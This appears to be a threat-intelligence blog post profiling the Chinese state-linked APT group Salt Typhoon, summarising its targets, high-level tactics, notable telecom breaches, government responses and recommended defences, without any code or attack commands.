Salt Typhoon, an advanced persistent threat

Sun Tzu made the statement “If you know the enemy and know yourself, you need not fear the result of a hundred battles.”

This highlights the significance of knowledge and strategy in overcoming adversaries. The more you know about your opponent, the better equipped you are to achieve victory.

So, to help you achieve that goal, here is some research on Salt Typhoon.

Salt Typhoon, an advanced persistent threat (APT) group, is a Chinese state-sponsored entity known for its cyber espionage activities and strategic operations aiming to disrupt critical infrastructures. Active since at least 2019, Salt Typhoon, also referred to as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, has been linked to China’s Ministry of State Security (MSS). This affiliation provides them with significant resources, protection, and strategic direction.

Targets and Objectives

Salt Typhoon primarily targets telecommunications companies, government bodies, and technology firms to gather crucial intelligence and exert strategic influence. Their operations span globally, focusing on regions such as North America, Southeast Asia, and Africa. Key targets include:

• Telecommunications Providers: Collecting call metadata, intercepting communications, and tracing target movements.
• Hotels: Tracking locations and movements of significant individuals.
• Government Agencies: Extracting sensitive information for intelligence purposes.
• Internet Service Providers (ISPs): Compromising systems managing court-authorized wiretaps.

Additional targets include military institutions, solar energy companies, financial bodies, NGOs, engineering firms, and law practices, reflecting a broad interest in sectors holding strategic or sensitive data.

Tactics, Techniques, and Procedures (TTPs)

Salt Typhoon employs a range of sophisticated tactics to infiltrate and exploit targeted networks:

• Exploiting Vulnerabilities: Using both known and zero-day vulnerabilities in public-facing systems to gain access. Notable exploits include ProxyLogon (CVE-2021-26855) and various vulnerabilities in VPN configurations.
• “Living off the Land” Techniques: Employing legitimate tools like PowerShell for stealthy operations, including reconnaissance and data exfiltration.
• Custom Malware: Deploying bespoke malware such as SparrowDoor, GhostSpider, and the Demodex rootkit to maintain persistence and evade detection.
• DLL Search-order Hijacking: Used to covertly deploy backdoors like SparrowDoor.
• Lateral Movement: Utilizing tools such as PsExec and WinRAR for network navigation and data compression; deploying Certutil and BITSAdmin for downloading malicious scripts.
• Credential Harvesting: Employing tools like Mimikat_ssp and new NinjaCopy variants for credential extraction and file exfiltration.

Notable Campaigns

Salt Typhoon’s operations have included high-impact campaigns:

• ProxyLogon Exploitation (2021): A swift exploitation of Microsoft Exchange server vulnerabilities following patch releases.
• Telecom Breaches (2024): Major breaches of US telecom giants like AT&T and Verizon, compromising sensitive communications data.
• ISP Infiltration: Accessing sensitive ISP data, including information from legal wiretaps.
• Political Targeting: Attempts to compromise phones of high-profile US political figures, indicating ambitions to influence political processes.

Government and Industry Responses

In response to Salt Typhoon’s aggression, various measures have been implemented:

• Cyber Unified Coordination Group: A US initiative to mitigate breaches and investigate security lapses.
• Guidance Issuance: Recommendations for telecom sectors to detect, address vulnerabilities, and enhance cybersecurity.
• China Telecom Ban: A move to limit possible espionage activities.
• Enhanced Cybersecurity Measures: Promotion of zero-trust architecture, continuous monitoring, and collaboration between private and public entities.

Security agencies like CISA, NSA, and the FBI have also provided guidelines to strengthen defenses against such threats, emphasizing robust authentication processes and secure communications.

Impact and Implications

Salt Typhoon’s espionage activities have significant ramifications:

• Threatening Privacy and Security: Theft of communications records undermines privacy and security protocols.
• Jeopardizing Law Enforcement: Breach of wiretap systems hampers law enforcement capabilities.
• Critical Infrastructure Exposure: Endangers sectors crucial to national security and economic stability, highlighting vulnerabilities to external threats.
• Political Process Influence: Attempts to compromise political figures imply a strategic approach to destabilize confidence in cybersecurity governance.

Defense Strategies

Organizations are advised to adopt comprehensive defense strategies to counteract Salt Typhoon:

• Network Segmentation and Monitoring: Ensuring critical systems are isolated and network activity is consistently monitored.
• Regular Patch Management: Keeping up-to-date with security patches to close vulnerability exploitation windows.
• Zero Trust Architecture: Implementing strict access control, communication encryption, and principle of least privilege.
• Threat Intelligence Utilization: Leveraging threat intelligence data to preemptively guard against known TTPs.
• Secure by Design Principles: Encouraging integration of security measures throughout software development.

Salt Typhoon represents a significant cyber threat, equipped with sophisticated techniques and far-reaching strategic objectives. Their focus on espionage and infrastructure disruption urges a fortified global cybersecurity stance. Continuous vigilance strengthened cybersecurity protocols, and collaboration between public and private sectors.